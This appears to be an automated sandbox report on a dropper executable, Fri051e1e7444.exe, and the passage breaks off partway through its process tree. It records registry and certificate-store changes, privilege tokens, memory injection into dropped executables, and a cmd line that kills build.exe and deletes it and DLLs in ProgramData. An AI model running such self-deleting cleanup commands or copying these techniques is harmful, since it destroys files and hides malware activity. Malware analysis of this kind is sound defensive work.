Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 25b0743d06c1d701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Process not Found Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Process not Found Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Fri051e1e7444.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A Fri051e1e7444.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 5c000000010000000400000000080000040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Fri051e1e7444.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Fri051e1e7444.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4148 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 559 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 569 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 692 Fri051e1e7444.exe 692 Fri051e1e7444.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe 1808 AgGOSclM3apmo74sb5reIH3y.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3032 Process not Found -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 2524 TrvPKMajtMffCi7iitJBZDnB.exe 5124 zObJUR9EVjyfYx_qv35UyzNe.exe 3952 A53B.exe 6004 19D1.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeAssignPrimaryTokenPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeLockMemoryPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeIncreaseQuotaPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeMachineAccountPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeTcbPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeSecurityPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeTakeOwnershipPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeLoadDriverPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeSystemProfilePrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeSystemtimePrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeProfSingleProcessPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeIncBasePriorityPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeCreatePagefilePrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeCreatePermanentPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeBackupPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeRestorePrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeShutdownPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeDebugPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeAuditPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeSystemEnvironmentPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeChangeNotifyPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeRemoteShutdownPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeUndockPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeSyncAgentPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeEnableDelegationPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeManageVolumePrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeImpersonatePrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeCreateGlobalPrivilege 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: 31 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: 32 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: 33 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: 34 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: 35 1892 W1bYeEIYUUPaZDtUMFaYTrWG.exe Token: SeRestorePrivilege 4376 cmd.exe Token: SeBackupPrivilege 4376 cmd.exe Token: SeShutdownPrivilege 3032 Process not Found Token: SeCreatePagefilePrivilege 3032 Process not Found Token: SeShutdownPrivilege 3032 Process not Found Token: SeCreatePagefilePrivilege 3032 Process not Found Token: SeDebugPrivilege 1784 r3FYzQQodjD253E15m9ZD5ze.exe Token: SeDebugPrivilege 4376 cmd.exe Token: SeShutdownPrivilege 3032 Process not Found Token: SeCreatePagefilePrivilege 3032 Process not Found Token: SeShutdownPrivilege 3032 Process not Found Token: SeCreatePagefilePrivilege 3032 Process not Found Token: SeShutdownPrivilege 3032 Process not Found Token: SeCreatePagefilePrivilege 3032 Process not Found Token: SeShutdownPrivilege 3032 Process not Found Token: SeCreatePagefilePrivilege 3032 Process not Found Token: SeShutdownPrivilege 3032 Process not Found Token: SeCreatePagefilePrivilege 3032 Process not Found Token: SeShutdownPrivilege 3032 Process not Found Token: SeCreatePagefilePrivilege 3032 Process not Found Token: SeShutdownPrivilege 3032 Process not Found Token: SeCreatePagefilePrivilege 3032 Process not Found Token: SeShutdownPrivilege 3032 Process not Found Token: SeCreatePagefilePrivilege 3032 Process not Found Token: SeShutdownPrivilege 3032 Process not Found Token: SeCreatePagefilePrivilege 3032 Process not Found Token: SeDebugPrivilege 4980 WerFault.exe Token: SeDebugPrivilege 4868 DownFlSetup999.exe Token: SeShutdownPrivilege 3032 Process not Found Token: SeCreatePagefilePrivilege 3032 Process not Found -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3032 Process not Found 3032 Process not Found -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3032 Process not Found 4736 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 692 wrote to memory of 1808 692 Fri051e1e7444.exe 78 PID 692 wrote to memory of 1808 692 Fri051e1e7444.exe 78 PID 692 wrote to memory of 2076 692 Fri051e1e7444.exe 79 PID 692 wrote to memory of 2076 692 Fri051e1e7444.exe 79 PID 692 wrote to memory of 1184 692 Fri051e1e7444.exe 83 PID 692 wrote to memory of 1184 692 Fri051e1e7444.exe 83 PID 692 wrote to memory of 1184 692 Fri051e1e7444.exe 83 PID 692 wrote to memory of 1396 692 Fri051e1e7444.exe 81 PID 692 wrote to memory of 1396 692 Fri051e1e7444.exe 81 PID 692 wrote to memory of 1396 692 Fri051e1e7444.exe 81 PID 692 wrote to memory of 2520 692 Fri051e1e7444.exe 82 PID 692 wrote to memory of 2520 692 Fri051e1e7444.exe 82 PID 692 wrote to memory of 2520 692 Fri051e1e7444.exe 82 PID 692 wrote to memory of 2404 692 Fri051e1e7444.exe 80 PID 692 wrote to memory of 2404 692 Fri051e1e7444.exe 80 PID 692 wrote to memory of 2404 692 Fri051e1e7444.exe 80 PID 692 wrote to memory of 1892 692 Fri051e1e7444.exe 88 PID 692 wrote to memory of 1892 692 Fri051e1e7444.exe 88 PID 692 wrote to memory of 1892 692 Fri051e1e7444.exe 88 PID 692 wrote to memory of 2184 692 Fri051e1e7444.exe 87 PID 692 wrote to memory of 2184 692 Fri051e1e7444.exe 87 PID 692 wrote to memory of 2184 692 Fri051e1e7444.exe 87 PID 692 wrote to memory of 1228 692 Fri051e1e7444.exe 86 PID 692 wrote to memory of 1228 692 Fri051e1e7444.exe 86 PID 692 wrote to memory of 1228 692 Fri051e1e7444.exe 86 PID 692 wrote to memory of 2120 692 Fri051e1e7444.exe 84 PID 692 wrote to memory of 2120 692 Fri051e1e7444.exe 84 PID 692 wrote to memory of 2120 692 Fri051e1e7444.exe 84 PID 692 wrote to memory of 2060 692 Fri051e1e7444.exe 85 PID 692 wrote to memory of 2060 692 Fri051e1e7444.exe 85 PID 692 wrote to memory of 2060 692 Fri051e1e7444.exe 85 PID 692 wrote to memory of 3724 692 Fri051e1e7444.exe 90 PID 692 wrote to memory of 3724 692 Fri051e1e7444.exe 90 PID 692 wrote to memory of 3724 692 Fri051e1e7444.exe 90 PID 692 wrote to memory of 3960 692 Fri051e1e7444.exe 89 PID 692 wrote to memory of 3960 692 Fri051e1e7444.exe 89 PID 692 wrote to memory of 3960 692 Fri051e1e7444.exe 89 PID 692 wrote to memory of 1952 692 Fri051e1e7444.exe 93 PID 692 wrote to memory of 1952 692 Fri051e1e7444.exe 93 PID 692 wrote to memory of 1952 692 Fri051e1e7444.exe 93 PID 692 wrote to memory of 3532 692 Fri051e1e7444.exe 92 PID 692 wrote to memory of 3532 692 Fri051e1e7444.exe 92 PID 692 wrote to memory of 3532 692 Fri051e1e7444.exe 92 PID 692 wrote to memory of 3608 692 Fri051e1e7444.exe 100 PID 692 wrote to memory of 3608 692 Fri051e1e7444.exe 100 PID 692 wrote to memory of 1784 692 Fri051e1e7444.exe 98 PID 692 wrote to memory of 1784 692 Fri051e1e7444.exe 98 PID 692 wrote to memory of 1784 692 Fri051e1e7444.exe 98 PID 692 wrote to memory of 1632 692 Fri051e1e7444.exe 97 PID 692 wrote to memory of 1632 692 Fri051e1e7444.exe 97 PID 692 wrote to memory of 1632 692 Fri051e1e7444.exe 97 PID 692 wrote to memory of 2732 692 Fri051e1e7444.exe 96 PID 692 wrote to memory of 2732 692 Fri051e1e7444.exe 96 PID 692 wrote to memory of 2732 692 Fri051e1e7444.exe 96 PID 692 wrote to memory of 680 692 Fri051e1e7444.exe 94 PID 692 wrote to memory of 680 692 Fri051e1e7444.exe 94 PID 692 wrote to memory of 680 692 Fri051e1e7444.exe 94 PID 2404 wrote to memory of 2524 2404 TrvPKMajtMffCi7iitJBZDnB.exe 102 PID 2404 wrote to memory of 2524 2404 TrvPKMajtMffCi7iitJBZDnB.exe 102 PID 2404 wrote to memory of 2524 2404 TrvPKMajtMffCi7iitJBZDnB.exe 102 PID 2404 wrote to memory of 2524 2404 TrvPKMajtMffCi7iitJBZDnB.exe 102 PID 2404 wrote to memory of 2524 2404 TrvPKMajtMffCi7iitJBZDnB.exe 102 PID 2404 wrote to memory of 2524 2404 TrvPKMajtMffCi7iitJBZDnB.exe 102 PID 3532 wrote to memory of 588 3532 omVlxP3RfKIM3eS4IizTb8IP.exe 109
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Users\Admin\Pictures\Adobe Films\AgGOSclM3apmo74sb5reIH3y.exe"C:\Users\Admin\Pictures\Adobe Films\AgGOSclM3apmo74sb5reIH3y.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1808
-
-
C:\Users\Admin\Pictures\Adobe Films\LYOsEH3xUWPTG6qnvscLPweb.exe"C:\Users\Admin\Pictures\Adobe Films\LYOsEH3xUWPTG6qnvscLPweb.exe"2⤵
- Executes dropped EXE
PID:2076 -
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4732 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit4⤵PID:4672
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f5⤵
- Kills process with taskkill
PID:5784
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:3304
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TrvPKMajtMffCi7iitJBZDnB.exe"C:\Users\Admin\Pictures\Adobe Films\TrvPKMajtMffCi7iitJBZDnB.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Users\Admin\Pictures\Adobe Films\TrvPKMajtMffCi7iitJBZDnB.exe"C:\Users\Admin\Pictures\Adobe Films\TrvPKMajtMffCi7iitJBZDnB.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2524
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_g7tmzcXIP_JNr02UultIUME.exe"C:\Users\Admin\Pictures\Adobe Films\_g7tmzcXIP_JNr02UultIUME.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1396 -
